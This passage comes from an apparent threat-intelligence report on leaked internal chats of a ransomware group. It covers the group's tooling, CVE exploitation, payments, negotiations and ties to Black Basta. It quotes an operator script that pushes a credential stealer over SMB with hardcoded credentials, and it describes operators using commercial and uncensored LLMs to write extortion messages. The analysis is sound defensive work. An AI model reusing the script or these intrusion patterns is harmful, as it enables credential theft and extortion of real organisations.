Translation: “Gunra — what even is that... Hyflock same thing. That idiot messaged me. ShadowByt3$ RAAS — idk / Anubis — seen him? / CHAOS — will they even take him. / The Gentlemen's / Dragon Force / that's the whole choice.”
Note: zeta88 evaluates rival RaaS programs, revealing competitive landscape awareness and affiliate-shopping behaviour.

2026-04-21 19:02 — zeta88:
“Потому что я знаю что драгонам платят, и они платят адвертам, и за них только за софт и панель плохое говорили. Не про них самих. А про нас ты всё сам знаешь)”
Translation: “Because I know DragonForce pays, and they pay affiliates — only the software and panel got bad reviews, not the people themselves. And you know everything about us yourself.”
Note: Positive assessment of DragonForce's affiliate compensation; implicit comparison to The Gentlemen's own standing.

The following a botnet/malware advertisement on the RAMP forum (Russian Anonymous Marketplace), a well-known Russian-language cybercrime forum associated with ransomware.

This is a botnet/malware advertisement on the RAMP forum (Russian Anonymous Marketplace), a well-known Russian-language cybercrime forum associated with ransomware groups. The site is on a .onion (Tor) domain, and the forum branding shows DragonForce at the top left.

The post is by a user called Mr.Bang (member since Sep 2023). Here's a translation of the Russian text:

• “Закреп система на основе белого софта” — Persistence system based on legitimate (“white”) software
• “Защита от детектов основного ядра” — Protection from detection of the core payload
• “Даже при попадании на Virustotal 0/61” — Even if uploaded to VirusTotal, 0/61 detections
• “Ботнэт система” — Botnet system
• “СЛОЖНО вычислить Админку” — Hard to trace the admin panel
• “Админка -> белый сайт-сервер Relay <- бот” — Admin panel → legitimate site/server relay → bot (describing the C2 architecture using a clean relay to hide the backend)
• “Возможности админки-команды: Запустить / Скачать и запустить” — Admin panel commands: Run / Download and run
• “Возможные дополнения: Файловый менеджер, Стиллер” — Optional modules: File manager, Stealer
• “да и почти что угодно” — and pretty much anything else

3.7.7 Hyper-V Volume Manager Targeting

Operator screenshots show active interaction with Hyper-V Volume Manager interfaces on victim infrastructure. The group targets Hyper-V virtual disk volumes directly, enabling encryption at the hypervisor level rather than within individual guest VMs. This is particularly problematic for defenders: encrypting at the Hyper-V volume layer bypasses guest-level EDR and backup agents entirely, rendering per-VM security controls ineffective. A single encryption pass at the host level can simultaneously destroy all guest VMs hosted on the hypervisor, dramatically amplifying the blast radius of a single compromised Hyper-V host.

Hyper-V Volume Manager interface — operator targeting virtual disk volumes at the hypervisor level.

3.7.8 Operator Infrastructure Tooling — Zabbix, Vaultwarden, RAZBOR, FIRSTMAIL

Image above shows Zabbix and Vaultwarden usage, plus bookmarks for RAZBOR (“analysis” in Russian) and FIRSTMAIL (likely a mail/credential workflow).

• Zabbix dashboard tab: Indicates the operators monitor infrastructure health (hosts, services, uptime, alerts) in the same browsing session used for operations — reinforcing weak separation between ops and admin tooling.
• Vaultwarden tab: Suggests the group uses a self-hosted Bitwarden-compatible password manager to store and retrieve credentials (victim creds, internal service creds, infrastructure logins), enabling rapid reuse and sharing across operators.
• Bookmarks — RAZBOR / FIRSTMAIL: These shortcuts imply repeatable internal workflows: “RAZBOR” as a dedicated analysis portal/workspace, and “FIRSTMAIL” as an email access, mailbox triage, or credential delivery system used during targeting and/or post-compromise operations.

3.7.9 LDAP Configuration Extraction from FortiGate Dumps

FortiGate configuration exports shared between affiliates contain plaintext LDAP bind credentials — including the bind DN, bind password, LDAP server IP/hostname, and base DN for directory searches. These configurations are extracted directly from FortiGate config user ldap stanzas and provide attackers with authenticated read access to Active Directory without needing to compromise a domain-joined host first. In the corpus, LDAP bind credentials are used for AD enumeration (user/group listing, OU structure mapping) and as a pivot point for password spraying against domain controllers. CyberArk-integrated targets are also observed — the screenshot below shows a FortiGate LDAP configuration pointing to a CyberArk-managed directory environment, indicating that even organizations with privileged access management (PAM) solutions in place had their LDAP bind credentials exposed through the FortiGate configuration layer, bypassing the PAM controls entirely:

3.7.10 Voice-Based Extortion — English-Speaking Caller Recruitment

This is an Exploit.in forum profile for a user called “perfect” (profile ID 216843), and the browser tab next to it shows “quant - IT-Consult” — suggesting whoever took this screenshot was investigating quant's forum presence alongside this profile.

“Ищу сипку/Looking for a SIP” (23 November 2025) — perfect is looking for a US SIP trunk with P1 priority, budget $2,000–$3,000, escrow required. SIP stands for Session Initiation Protocol. It's a signaling protocol used in telecommunications to initiate, maintain, and terminate real-time communication sessions — most commonly voice calls over the internet (VoIP), but also video calls and messaging.

SIP trunks are used for making VoIP calls that appear to originate from US phone numbers. In a ransomware context, this is infrastructure for cold-calling victims — a tactic where operators phone the target company directly to pressure them into paying, often impersonating IT support or referencing the encryption to create panic.

“Ищу пару человек под прозвон корп USA” (17 December 2025) — posted twice, in Russian and English. The title translates to “Looking for a couple of people for cold-calling US corporations.” The English version states: “I'm looking for several ringers for corpses, the revenues are quite large.” The word “corpses” is almost certainly a mistranslation or slang for “corps” (corporations). They're recruiting English-speaking callers to phone US corporate victims, requiring “sufficient level of English.”

This links the Gentlemen's operation to voice-based extortion pressure — not just DLS posting and encryption, but actively calling victims to accelerate payment. The SIP purchase predates the caller recruitment by three weeks, showing methodical infrastructure build-out.

Analyst assessment — “perfect” / SIP link to The Gentlemen: The co-occurrence of the “perfect” Exploit.in profile (SIP trunk procurement, English-speaking caller recruitment) and the “quant — IT-Consult” browser tab in the same operator screenshot is assessed as a moderate-confidence indicator that “perfect” is either a Gentlemen affiliate or a shared-services provider used by the group. The evidentiary chain is as follows: (1) the screenshot was captured on a Gentlemen operator's desktop during active operations; (2) the operator was simultaneously viewing quant's forum presence alongside perfect's profile, suggesting an operational relationship rather than casual browsing; (3) perfect's SIP procurement timeline (November 2025) and caller recruitment (December 2025) align precisely with the Gentlemen's scaling phase visible in the corpus; (4) the cold-calling capability matches the group's multi-layered extortion model (encryption + DLS + direct victim contact). However, this remains circumstantial — the screenshot alone does not confirm that perfect is a Gentlemen member versus an independent service provider whose offerings were being evaluated. Further corroboration (e.g., shared Tox IDs, payment flows, or forum DMs) would be needed to elevate this to high confidence. This assessment was developed alongside intelligence gathered by the broader Ransom-ISAC community.

3.7.11 Operator Payments and AML Disclosures

A February 2026 conversation captured between zeta88 and Kunder provides direct evidence of operator payments and significant operational intelligence on cash-out methodologies.

Verbatim quotes from payment exchange:

This exchange provides actionable Bitcoin wallet indicators, fiat cash-out vectors (Tinkoff QR codes), and insight into the group's internal financial logistics. It also highlights operational friction (DDoS attacks on their leak blog) and team dynamics, with zeta88 framing the payment as an investment in “our common cause.”

Of particular note is the payment value: zeta88 sent Kunder approximately $1,400 USD. This amount provides an interesting benchmark for either an advance, a retainer, or a flat-fee payment to a newly recruited affiliate handling initial access/phishing, demonstrating the day-to-day operational compensation structure apart from the massive multi-million-dollar final ransom splits.

It is notable that this is a relatively modest, operational “working payment” compared to the headline ransom figures the group pursues, and it provides a rare glimpse into the practical, day-to-day cashflow between core operators and affiliates.

BTC transfer from zeta88 to Kunder

The origin message coming from the leader zeta88 being 17U3tN7hzwYwwya8qkyZgnG9jy3unHG7xL:

zeta88's BTC address

Zeta88's wallet received funds from generally green sources suggesting effective ML techniques for source of funds.

However, payments by zeta88 reveal several patterns most likely associated with 'freelance' threat actors and infrastructure via Telegram based payment processors. There is also some exposure to russia based/russian speaker serving services, such as Grinex.

Freelance threat actors are paid around 1000 USD for unspecified services on an ad-hoc basis. There are four such payments, though only one has an identified counterparty, Kunder.

Kunder deposited funds directly to an unlicensed exchange known to have a low KYC threshold; the account on the platform had a lifetime receipt of 2.5 BTC between Sep 2025 and May 2026, totalling around 229 000 USD and indicating a lucrative career with 'The Gentlemen'. Backtracing funds from the deposit address showed relationships with high risk and illicit services based and service russian users such as Rapira, suggesting the user of this wallet is likely russian or a russian speaker.

Crystal Intelligence: zeta88 wallet analysis

Other payments from the address also showed on-chain relationships with crypto-draining malware affecting Asian-based victims; these addresses similarly showed exposure to services catering to individuals likely based in these jurisdictions.

Some funds appeared to be consistent with payment for infrastructure; low value transactions to payment processors. Notably, payments were made to Cryptomus, a service that has often been associated with Russian cybercrime related activity.

Crystal Intelligence: On-chain analysis of zeta88 infrastructure

3.8 Stealer Toolkit — Key Findings (TOOLS/FOBOS)

Confirmed tooling present in operator kit (from screenshots):

Firefox/Browser credential extraction DLL set (observed in multiple screenshots):
freebl3.dll, mozglue.dll, nss3.dll, softokn3.dll, nspr4.dll, plc4.dll, plds4.dll, msvcp140.dll, vcruntime140.dll
These are Mozilla NSS libraries commonly used for offline decryption of Firefox/Thunderbird stored credentials. Operator notes indicate their method broke for newer Firefox versions and they were awaiting updated DLLs.

AV-evasion DLL naming observed (masquerading as game anti-cheat / security tooling):
EAAntiCheat1.exe.dll, Valorant.exe.dll, Sophos.exe.dll, Avast.exe.dll

CVEs referenced as exploited or operationally discussed:

• CVE-2024-55591 (FortiOS auth bypass — primary initial access)
• CVE-2024-21412 (WaterHydra / URL-in-ZIP)
• CVE-2025-32433 (Erlang/OTP SSH RCE — exploit sharing context; “Avoid” referenced)
• CVE-2025-33073 (discussed by qbit)

Stealer toolkit — verbatim quotes (selected)

XenAllPasswordPro deployment script (verbatim excerpt):

2026-01-09 17:12:14 — zeta88:
for ip in $(cat ips.txt); do
    url="http://10.10.16.249:8887/"
    temp="BdDfelT"
    user="itadmin"
    pass="zhhyx3#4$"
    nxc smb $ip -u $user -p $pass -X '@("XenAllPasswordPro.exe","freebl3.dll","mozglue.dll","nss3.dll","softokn3.dll","vcruntime140.dll"...)'
    nxc smb $ip -u $user -p $pass -x "C:\\Windows\\Temp\\${temp}\\XenAllPasswordPro.exe -a -r ...${ip}.html"
done

Firefox NSS “External DLL” awareness (OCR excerpt):

“External file is needed for mozilla based apps like firefox, thunderbird, postbird etc. Important Update: Few days ago, our Dev team found that Firefox has made changes to its NSS library (in External folder DLLs) affecting mostly Firefox v140+ or higher. Our team will be rolling out new releases soon after further verification. If you want, we can send you a private copy of the new External DLL folder.”

Exploit chaining / coercion awareness (verbatim):

zeta88: “Находит WebDAV WebClient, CVE-2025-33073 (NTLM reflection), NTLMv1 + всякие PrinterBug, PetitPotam и т.п.”
Translation: “Finds WebDAV WebClient, CVE-2025-33073 (NTLM reflection), NTLMv1 + various PrinterBug, PetitPotam etc.”
Note: Enumerates coercion/relay attack surface; demonstrates awareness of multiple NTLM abuse vectors.

CVE-2024-55591 exploitation confirmed (verbatim):

zeta88: “[] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation”

CVE references — additional verbatim quotes:

Kunder: “CVEs: [CVE-2024-55591]”

qbit (citing forum handle Avoid): “Используйте мой чекер CISCO. А затем свежайший сплоит CVE-2025-32433 и доступы в кармане.”
Translation: “Use my Cisco checker. Then the freshest exploit CVE-2025-32433 and access is in your pocket.”
Note: Third-party exploit advertisement shared in-channel; indicates active CVE monitoring and tool sourcing.

4. AI-Assisted Operations — LLMs, Uncensored Models & GPU Compute

The leak contains direct evidence of operators integrating AI tools into multiple stages of the ransomware lifecycle: negotiation language generation, uncensored model sharing, and proposed GPU-accelerated triage of stolen data. While AI adoption by cybercriminals has been widely theorised, this corpus provides some of the first verbatim-supported evidence of how a mid-tier RaaS operation practically adopts these capabilities — including where they fail.

4.1 Observed AI Integration Points

Negotiation drafting and language generation. zeta88 explicitly references GPT and Claude as standard operational tools for producing negotiation text:

zeta88:
“Гпт . клауде - мы играем в переговорщика. он тебе строчит )”
Translation: “GPT, Claude — we're playing negotiator. It'll write for you.”
Note: Direct evidence of commercial LLM use for negotiation language generation. The casual tone suggests established practice, not experimentation.

The operational implication is immediate: AI-generated text allows Russian-speaking operators to conduct fluent English-language victim negotiations without native speakers — directly reducing the group's dependency on the caller recruitment pipeline documented in Section 3.7.10.

Uncensored model sharing and local deployment. qbit shared a link to an “abliterated” Qwen model on Hugging Face, marketed as uncensored — indicating active experimentation with locally deployable LLMs that bypass the safety guardrails of commercial APIs. “Abliterated” models have had alignment/safety training deliberately removed, enabling unconstrained output including social engineering scripts and data analysis without content filtering.

The shift toward local models is operationally significant: it eliminates the audit trail created by commercial API usage (OpenAI, Anthropic), removes the risk of account termination for terms-of-service violations, and mirrors legitimate enterprise concerns about data sovereignty — applied to criminal infrastructure.

GPU rental for AI-assisted data triage. Protagor proposed renting GPU compute on vast.ai to run uncensored models against stolen victim data:

Protagor:
“отдать ии на просмотр важных данных... на vast.ai взять ГПУ там ИИ без цензуры можно попробовать”
Translation: “Give AI to review important data... rent GPU on vast.ai, can try uncensored AI there.”
Note: Proposes rented GPU compute for uncensored AI-assisted triage of stolen data — a potential force multiplier for identifying high-value extortion material.

This represents a qualitative shift in post-compromise operations. Currently, ransomware groups manually review stolen data to identify leverage material (financial records, personal data, regulatory documents). AI-assisted triage could dramatically accelerate this process, enabling operators to process terabytes of exfiltrated data in hours rather than days — directly increasing the speed and precision of double-extortion campaigns.

Operator scepticism and uneven adoption. Not all operators find AI tools useful:

Wick:
“не, нихуя не получается. иишка хуйню советует мне какую то”
Translation: “Nothing works, the AI is giving me bullshit advice.”
Note: Uneven adoption — at least one affiliate finds LLMs unhelpful for technical troubleshooting, suggesting AI integration is still operator-dependent rather than systematised.

4.2 Translation Tooling — Reverso as Operational Bridge

Beyond LLMs, the group relies on Reverso.net for English translation, visible in operator browser tabs during negotiation workflows. This positions AI language tools as one layer in a broader translation stack — LLMs for drafting fluent negotiation prose, Reverso for quick word/phrase lookups — that collectively reduces the language barrier for non-English-speaking operators engaging with English-speaking victims.

4.3 Analytical Assessment — Implications for the RaaS Ecosystem

The AI integration observed in this corpus is early-stage but directionally significant. Three implications warrant attention from defenders:

1. Faster victim processing at scale. AI-assisted data triage — if operationalised beyond the proposal stage — would allow groups to process exfiltrated data faster, identify leverage material more precisely, and move to negotiation sooner. For defenders, this compresses the window between breach detection and extortion contact.

2. Reduced language barriers. LLM-generated negotiation text enables Russian-speaking operators to conduct credible English-language negotiations without native speakers. This lowers the barrier to entry for non-English-speaking RaaS operations targeting Western victims and reduces recruitment dependencies (compare the SIP trunk procurement and caller recruitment pipeline in Section 3.7.10).

3. Shift to local/uncensored models. The progression from commercial APIs (GPT/Claude) toward self-hosted uncensored models (abliterated Qwen, rented GPU on vast.ai) mirrors a broader trend: operators want the capability without the audit trail. Commercial API monitoring and takedowns become less effective as groups shift to local inference on rented or owned hardware.

4.4 Branding

The official logo used by the group was developed using ChatGPT GPT-4o, OpenAI API:

The Gentlemen's logo

The following is the metadata that can be extracted from this logo, where you can see claim generator info name is ChatGPT:

Logo metadata — EXIF claim generator field showing “ChatGPT” as the creation tool

5. Fortinet Target Pipeline

The corpus contains 98 deduplicated Fortinet device entries with IP addresses, models, firmware versions, hostnames, and country information. These represent the group's active targeting pipeline.

Fortinet target pipeline — geographic distribution (pie chart)

The full target list with IPs, models, and firmware versions is available in the accompanying Fortinet_targets.csv data file.

FortiGate interfaces page for a victim network

Structured Fortinet target spreadsheet

Fortinet scan logs from leaked operator data

6. Victim Dossier

We parsed the 22 Rocket.Chat CSV exports into a queryable database, ran automated IOC extraction across all message bodies, and identified victims through a tiered confidence model — requiring direct evidence of internal access (DA confirmation, locker commands, credential usage, ransom notes) for the highest tier, down to FortiGate hostname identification for lower tiers. After deduplicating cross-tier overlaps, we arrived at 66 unique victim organisations. This count was independently validated by the Ransom-ISAC collaborative analysis using a separate methodology.

The following entities have documented internal access in the corpus, ordered by volume of evidence.

Victim Geographic Distribution — 66 confirmed victims across 4 regions

Victim Sector Breakdown — 66 confirmed victims across 13 sectors

RansomLook DLS Public-Claim Overlap (8 of 66 — 12.1%)

Victim domains extracted from the leaked corpus were cross-referenced against the RansomLook public API (/api/victims) to identify which chat-identified victims had also been publicly claimed on a ransomware leak site. Of the 66 confirmed victims, 8 matched RansomLook records attributed to The Gentlemen.

Note: 1 of the 8 overlapping victims (South African local municipality) was also previously claimed by LockBit5, representing a confirmed case of re-victimisation across groups.

The leak corpus documents 66 confirmed victims across multiple evidence tiers, spanning 30+ countries and diverse sectors.

Cross-referencing the 66 chat-identified victims against the RansomLook dataset revealed one instance of re-victimisation: a South African local municipality in the government sector was first claimed by LockBit5 on 7 December 2025, approximately three months before The Gentlemen fully encrypted the same organisation on 21 March 2026.

Additional analyst observations (from collaboration notes)

• 4vps.su references: collaborators noted repeated mentions of https://4vps.su/, aligning with The Gentlemen's public claim that their Rocket.Chat exposure was linked to a hosting-provider compromise. Notably, 4VPS.SU has prior associations with threat actor infrastructure — the Emotet botnet is known to have used this hosting provider, establishing a pattern of the service being leveraged by cybercriminal operations.
• China / South Korea target chatter: a collaboration note (screenshot) suggests discussion of a Chinese target and mentions a marketing agency without an associated IP or ZoomInfo reference. Two Chinese IP addresses were observed in the corpus: one could not be attributed to a known entity; the other resolves to Chinese Hospital entity, suggesting either a compromised host or operator infrastructure co-located at that provider. Separately, the leak includes target-intake style commentary for a South Korea–linked target (https://www.zoominfo.com/c/[REDACTED]) including an explicit strategy note (“Koreans care about their reputation a lot” and intent to leverage a client database).

China-linked infrastructure reference — IP attribution including Chinese hospital entity.

• Partial view of the operation: collaborators assessed the exported rooms appear to reflect primarily operator/affiliate chat, with other functional areas (phishing, brute-force, infrastructure) either missing from the leak or potentially externalized via an IAB/RaaS model.

[REDACTED] file listing — README-GENTLEMEN ransom note and .i8p14s encrypted files visible in directory, confirming successful ransomware execution

SMB authentication against a victim's domain controller

Intrusion — Kali terminal with SMB enumeration against a victim, iRMC S6 admin panel visible

Note: Detailed per-victim case studies have been excluded from this report to protect ongoing investigations and reduce report length. All victim-specific evidence, tiered attribution, and per-case write-ups are maintained internally.

6.1 Pre-Existing Ransom Notes from Other Groups

DeadBolt:

DeadBolt Team ransom note on a browsed NAS — prior compromise by another group on infrastructure later accessed by The Gentlemen.

The BTC address bc1q3adze9h3u5e8kx9zwj5tuw0dn0pq28f26xgpvq in here is a dead wallet address:

DiskStation Security:

This is a separate, much smaller operation from the main Gentlemen corporate ransomware — opportunistic NAS extortion, not the $200k corporate negotiations seen in the other screenshots. It's consistent with the T2-NAS tier activity in the chat leaks where actors were mass-hitting exposed Synology devices. The ransom note displays a contact email of [email protected], a payment deadline of February 19, 2025, and a demand of 0.052 BTC (~$5,000 at the time) to wallet address bc1qgl29fwvpaky7vr94qwufeq56d00l5h60fe7utx.

DiskStation Security Ransom Note

Similarly to DeadBolt the address is not active:

Possible other ransomware variant:

An unknown malware variant was also reported in an April 2026 operation led by the affiliate Kunder (a new operator not previously seen in the dataset). After gaining initial access and sharing credentials with zeta88, zeta88 responded by providing the credential dumpers XenArmor and kSlkatz. Despite active, GPO-managed Defender policies and blocked RDP to the domain controller, Kunder successfully accessed the file share server containing financial documents, planned exfiltration via rclone to MEGA, and deployed ransomware (indicated by a DATALOSS_WARNING_README ransom note). By April 23, Kunder's compromised account was demoted, degrading access. The operation culminated on April 30—the very last message captured in the dataset—with zeta88 instructing: “save everything important — I'm deleting Rocket.”

7. Negotiation Tactics

A complete victim-side negotiation transcript is captured in screenshots from room 133148. The negotiation platform is qTox (UI title q7sx), with the victim using handles MrM1989 / MrM19892 and the operator identified as “The Gentlemen.”

Pricing evolution observed:

1. Opening: $225K total ($80K decrypt + $120K data removal + $25K report)
2. Reduced: $185K ($65K decrypt + $95K data + $25K report)
3. Floor: $100K “all options”
4. Victim counter: $15K (for data deletion only)

Key operator statements:

• References victim's “$163 million revenue” and suggests paying through their “branch in Thailand” where “they will easy buy a bitcoins”
• States: “We will never confirm that we was attack you. This is our business, if we will not keep our words, no one will pay.”
• Offers “universal decryptors for each OS”
• Threatens: “Deadline still 29 nov. Then we will delete decryptor and start publish all data.”

Victim negotiation via qTox — pricing breakdown from $225K to $100K floor

The Gentlemen employed several deliberate tactics throughout the negotiation. They opened by framing payment as a business transaction rather than extortion, stating “this is our business, if we will not keep our words, no one will pay,” positioning themselves as reliable operators to reduce the victim's hesitation. They imposed a hard deadline of 29 November for data publication to create urgency, then offered decryptor testing on two files to build trust in their ability to deliver. When the victim pushed back on proof of exfiltration, they accommodated within a timeframe rather than dismissing the concern, maintaining rapport while keeping control of the timeline. Their pricing model appeared formulaic — 80/100/20 scoring encryption, data, and reports — suggesting a standardised valuation rather than an arbitrary demand, which lends perceived legitimacy to the asking price.

The victim representative used equally structured counter-tactics. They consistently framed themselves as a middleman acting on behalf of management rather than a decision-maker, creating negotiating distance and lowering the perceived authority at the table. They separated decryption value from data deletion value, conceding the encryption impact while demanding proof of exfiltration before agreeing to pay for deletion — effectively halving the leverage. Their final offer of 15A USD against a 200k demand was a deliberate low anchor, inviting a counter rather than closing.

The negotiation reaches its endgame here. The victim offers 15A USD ($15,000), the Gentlemen reject it and counter with their 200k valuation, then drop to 195k “for all options.” The victim comes back saying management approved a figure but notes that “ransom payments are prohibited in our country” and anything higher would require government permission they'd never get. The Gentlemen dismiss this, stating they already sent BTC instructions, that the victim should not pay as “ransom” officially, and that their organisation “already pay 100k for some group” previously — revealing they have intelligence on the victim's prior ransomware payment history, likely sourced from leaked negotiation data or dark web forums.

The closing is pure pressure. The Gentlemen claim this is their “lowest price” at 190k “all options,” warn there will be “no other options — pay, or everything was told before,” then pivot to making payment logistics sound trivial — “send amounts by chunks 30/50/50 from different wallets” and even suggest the victim can “send money to your branch to Thailand officially and they will easy buy a bitcoins” through a money remittance company. This is notable because it suggests the group has specific knowledge of the victim's geographic footprint (Thai operations) and local crypto purchasing options, indicating pre-negotiation OSINT on the victim's corporate structure.

8. External Actor Connections

8.1 Matrix Log Evidence (Pre-Rocket.Chat Operations)

Screenshots in the corpus reproduce Matrix chat logs from homeserver bestflowers247.online with handles @usernamegg, @lapa, and Tinker. These logs date from September–November 2023 and show phishing template drafting, OWA credential sharing, and Censys/Fortinet reconnaissance — operationally identical patterns to the current Rocket.Chat operations. This is not incidental overlap: the same reconnaissance methodology (Censys → Fortinet → credential harvest → OWA phishing) runs as a continuous thread from the 2023 Matrix logs through to the 2025–2026 Rocket.Chat corpus, indicating procedural continuity across platforms.

Cross-leak nickname overlap — Tinker: The handle “Tinker” appears across three separate ransomware leak corpora: Conti, Black Basta, and now The Gentlemen. In the Black Basta leaks, Tinker was associated with analyzing stolen data and conducting negotiations — precisely the functions visible in The Gentlemen's Matrix logs, where Tinker participates in phishing template drafting and credential operations. Analyst1's Anastasia Sentsova documented Tinker's role within the Black Basta ecosystem in their report Inside BlackBasta. The significance here is not just the name reuse — it is the functional continuity: Tinker performs the same category of work (data analysis, victim engagement, credential operations) across all three corpora. Handle reuse alone is weak evidence; handle reuse combined with identical operational function across three related RaaS ecosystems, on infrastructure publicly attributed to one of those ecosystems, is a substantially stronger signal.

Phishing template scripts for users

Infrastructure attribution: The Matrix homeserver bestflowers247.online is publicly attributed to the Black Basta leaked Matrix chat server (e.g., Cloudflare Cloudforce One reporting). The Gentlemen's operators possessed and shared screenshots from this homeserver — meaning they either (a) had direct access to Black Basta's internal communications platform, or (b) received these logs from someone who did. Neither scenario is consistent with the groups being unrelated. At minimum, this establishes a personnel or operational bridge between Black Basta and The Gentlemen's predecessor operations.

8.2 Devman / Black Basta Connection

The corpus contains screenshots and internal discussion directly linking The Gentlemen's operators to awareness of the Black Basta leadership and the Oleg Nefedov arrest:

Establishing Devman's identity (January 2026):

Weeks before the arrest news, quant and zeta88 were already discussing Devman's role:

2026-01-15 — quant [translated from Russian]:
“Is Black Basta Devman or what?”
Note: Suggests quant was not fully briefed on Black Basta's leadership structure — information asymmetry within the group.

2026-01-12 21:38:30 — zeta88:
“блять вот нахуй а ... это же пздц сразу человек всеми своими действиями показывал что нахуй такое не надо. с локов уходил психовал, стучал, туда сюда девману и обратно.”
Translation: “Fucking hell... that's insane, right away the person showed with all their actions that this isn't needed. Was leaving ransomware ops, was panicking, snitching, back and forth with Devman.”
Note: zeta88 references a volatile individual shuttling between groups and informing — implies awareness of informant activity within the broader RaaS ecosystem.

Reaction to the Nefedov arrest (February 2026):

On February 28, zeta88 posted two images in quick succession (05:20:06 and 05:20:31 UTC) with no accompanying text — a tweet about the de-anonymization of “Devman (aka Oleg Nefedov, Tramp, Sozdatel)” and a tweet about BKA/Europol/Interpol issuing an international arrest warrant for Nefedov as “leader of the Black Basta ransomware group.” The images were shared without comment in the CSV (8990/724140/27fef893b9320ac438dd7d837bda2208.csv); the context comes from the messages that immediately followed:

2026-02-28 — zeta88 [translated from Russian]:
“Payments were still happening etc etc. And there was an attack on us, and the attacker was attacked [blackmailed], and the researcher article was deleted.”
Note: Links the earlier insider/blackmail incident to the broader sequence of events around Devman's disappearance.

2026-02-28 — zeta88 [translated from Russian]:
“Short version: Devman either got arrested, health issues, or rebranded — completely gone.”
Note: Treats Devman's exit as a matter-of-fact competitive update, not a personal concern.

The group treats the Black Basta arrest as relevant background to their own competitive landscape — no explicit reaction to the tweet, just noting Devman's disappearance as a fact and moving on.

Oleg Nefedov identification — operator screenshot showing the Nefedov/Black Basta arrest tweets shared by zeta88

Additionally, a third-party messenger screenshot shows tank telling hastalamuerte: “I'm working on Devman's targets. Better chance of not starving” — suggesting direct operational overlap with former Black Basta infrastructure.

These connections are documented but not independently verified by the corpus.

8.3 Analytical Assessment — Black Basta Successor Faction (Moderate-High Confidence)

Confidence basis — five converging evidence threads:

What prevents high confidence: No confirmed real-world identity overlap between BB and Gentlemen personnel beyond the Tinker handle. The Russian-speaking RaaS ecosystem is small and incestuous — infrastructure sharing, personnel migration, and cross-pollination between groups are common and do not always indicate direct organisational succession. The Gentlemen may include former BB personnel without being a coherent successor entity. Further corroboration — shared Tox IDs across corpora, blockchain flow analysis linking BB and Gentlemen wallets, or confirmed identity overlap via OSINT — would be needed to elevate to high confidence.

What this means operationally: Organisations previously targeted by Black Basta should treat The Gentlemen as a continuation of the same threat for the purposes of risk assessment, threat modelling, and defensive prioritisation. Victim target lists, access brokers, infrastructure providers, and operational playbooks appear to have carried over. The Conti → Black Basta → The Gentlemen lineage represents one of the longest-running and most prolific strands of Russian-speaking ransomware operations, now in its third known iteration.

8.4 hastalamuerte / zeta88 — Operational Identity and Origin

External reporting from Group-IB, HivePro, Check Point, Cybereason, and Proven Data has established the following origin story, which the leaked corpus now corroborates from the inside:

Origin: On July 22, 2025, hastalamuerte opened a public arbitration thread on the RAMP forum, accusing Qilin's operators of a $48,000 USD payment dispute over unpaid affiliate commission. After this public dispute, hastalamuerte formalized an already-planned departure and launched The Gentlemen ransomware as an independent brand, reusing proven tooling and infrastructure from previous operations.

Prior affiliations: Hastalamuerte was an experienced affiliate who had previously worked with Embargo, LockBit, and Medusa before joining Qilin. Before becoming a RaaS, this operation was known as ArmCorp, a very active Qilin affiliate group. The name ArmCorp was present on the group's Rocket Chat webpage title.

Launch under dual aliases: The Gentlemen RaaS was formally advertised on underground forums on September 12, 2025 under the alias “Zeta88,” promoting a minimal-infrastructure model consisting of a leak site plus Tox messenger and a cross-platform locker. This confirms that hastalamuerte and zeta88 are publicly linked identities used by the same operation — hastalamuerte as the business/recruitment persona, zeta88 as the technical operator alias.

Scale: The group maintains an operational database of approximately 14,700 already exploited FortiGate devices globally, plus 969 validated brute-forced FortiGate VPN credentials ready for attack. The Gentlemen reached third place on the global ransomware list in Q1 2026, increasing their victim count from 40 in Q4 2025 to 166 in Q1 2026.

Analyst caveat: This is an unverified operator claim made in internal chat and may represent significant exaggeration or bragging; ransomware operators routinely inflate their track records in peer conversations to establish credibility.

Revenue model: The group offers affiliates an aggressive 90/10 revenue split, well above the ransomware industry norm of 80/20, along with full control over victim negotiations.

Within the leaked corpus, hastalamuerte appears in two contexts:

1. Third-party messenger conversation with tank (room 724140) discussing Devman's targets
2. Credential delivery in room 893402: zeta88 pastes a message formatted as [16:25:02] hastalamuerte: Domain: https://[REDACTED].okta.com — a copy-paste from an external platform relaying the victim's Okta credentials with 71 app assignments

Assessment: Based on the external reporting confirming that the RaaS was advertised under the alias “Zeta88” and managed by “hastalamuerte,” combined with the corpus evidence showing zeta88 forwarding hastalamuerte's credential drops into internal channels, the most likely interpretation is that these are two operational personas used by the same individual or a tightly integrated pair. hastalamuerte handles external forum presence, recruitment, and access brokering (T1erone, formerly RAMP), while zeta88 operates the internal Rocket.Chat infrastructure (1,891 messages, 18 of 22 rooms).

Source: HivePro

8.5 RaaS Program Discussion

A conversation in room 302930 (April 21, 2026) reveals the group's self-positioning within the RaaS ecosystem. qbit posts a list of programs:

Gunra / Hyflock / ShadowByt3$ RAAS / The Gentlemen's / Anubis / CHAOS / Dragon Force

zeta88 responds with candid assessments and concludes: “If I were choosing where to go myself — only these two programs out of ALL presented” (referring to DragonForce and The Gentlemen), adding: “I know they pay DragonForce, and they pay adverts… And about us you know everything yourself.”

qbit follows up: “I advertised The Gentlemen to him as best I could. He's thinking about it.”

8.6 Forum Vendor: Avoid

Forum screenshots show user Avoid selling Cisco VPN checkers ($700) and advertising bruteforce tools for Fortinet, SonicWall, Check Point, and others: “Time-tested software for over 15 years in the vx-team.”

Forum vendor “Avoid” — Cisco VPN checker and brute-force tool listings

User Avoid on Ramp seeking exploits for CVE-2025-32433

In the groupchats this user is referenced twice:

• Tinkoff QR codes (zeta88) — Russian bank fiat cashout
• “скупов” (зета88) — generic Russian term for crypto cash-out buyers/OTC traders

We assess with high confidence that the user Avoid is or is closely associated with Zeta88.

8.7 Forum Vendor: MonicaLewinsky and perfect

Exploit Forum screenshots show:

• MonicaLewinsky offering a corporate call center service for social engineering

• perfect seeking English-speaking callers for corporate phishing operations ($2,000 budget)

Forum vendors “MonicaLewinsky” and “perfect” — corporate call center and social engineering services

9. Data Integrity, Assumptions & Analytical Caveats

This section documents the assumptions, limitations, and integrity considerations underpinning this report. Readers should interpret all findings within these boundaries.

9.1 Data Provenance and Integrity

The leaked archive was first offered for sale on May 5, 2026 by “n345,” an account with zero prior reputation on PwnForums (created May 2026, 2 posts). The same user released the data freely on CryptBB three days later. The leaker's identity, motive, and method of acquisition remain unverified. Possible origins include a disgruntled insider, a competing ransomware group, a security researcher, or a law enforcement operation — each carrying different implications for data reliability.

